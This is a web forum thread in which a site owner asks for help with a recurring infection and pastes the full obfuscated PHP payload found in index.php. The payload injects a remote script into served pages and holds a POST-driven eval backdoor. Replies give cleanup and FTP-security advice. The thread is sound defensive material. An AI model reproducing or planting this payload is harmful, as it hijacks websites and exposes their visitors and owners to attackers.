Hi,
The website of my company, www.diesetelecom.com has been blacklisted by google. He’s coded in PHP. When I check the code, I found malicious code in the top of my index.php :
<?php eval(base64_decode(‘aWYoIWZ1bmN0aW9uX2V4aXN0cygncDluJykpe2Z1bmN0aW9uIHA5
bigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzL
CRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1
wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR
2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hd
GNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfH
woJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJ
ycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/K
Gh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHBy
ZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3Bs
YXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsY
WNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzP
XN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0R
vdkwyOWlaV1JwWlc1alpYTndiM0owTG1SbEwxUklVeTlWZDJVdWNHaHdJRDQ4TDNOamNtb
HdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKC
cjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzP
SRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBwOW4yKCRhLCRiLCRjLCRkKXtnbG9iYWwkcDluMT
skcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkcDluMSkpY2FsbF91c2VyX2Z1bmMoJ
HA5bjEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkY
T0kdlsnbmFtZSddKT09J3A5bicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJ
lYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWx
zZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZX
RfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ3A5bicpO2ZvcigkaT0wOyRp
PGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319
fSRwOW5sPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdwOW4yJykpIT0ncDluMicpPyRhOjA7Z
XZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7’)); ?><? include(“include/html_templates.php”);
When I upload the good index.php, he’ll be changed one day later with this code. I’m hosted at www.tophebergement.com and I use Fireftp to uplaod to the website.
Could you please help me fix this problem ?
Thanks you and I’m sorry for my bad english.
Change your FTP password to something very strong (10 chars at least, mix of letters, numbers, and punctuation). The most likely thing is that some bot has guessed your FTP password.
The next strong possibility is that there’s another PHP file on the site which has been infected, and gives the bot a backdoor on your site. You need to make sure that every PHP file is clean, and that there aren’t any added that you didn’t put there. Remember to check every single folder, not just the ones you normally keep PHP in.
You’ll have to look in all of your files for that or similar strings. Typically I see this same string in a file in the images folder of infected websites. Often times this file is named gifimg.php.
In addition to what @midnightmonster suggested about changing your FTP password, the method used most often to infect your site in the first place is stolen FTP passwords.
You have to do a virus scan of all PCs that have FTP access to your website. The virus works in a variety of ways and hides itself well. Start with your current ant-virus software and do a full scan of all PCs with FTP access to your website.
If that doesn’t find anything then try a different anti-virus software. Many have had good success with either AVG, Avast or Avira. Combine one of those with Malwarebytes and you should be able to find and remove any viruses. Don’t think that your current anti-virus software will find it. It may not.
I’ve worked on many websites and usually people tell me that they don’t have any viruses because they use something and something and something…
Often times these viruses “learn” how to evade detection of whatever anti-virus software is already installed.
Please post back here with what you find.
Thank you.
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
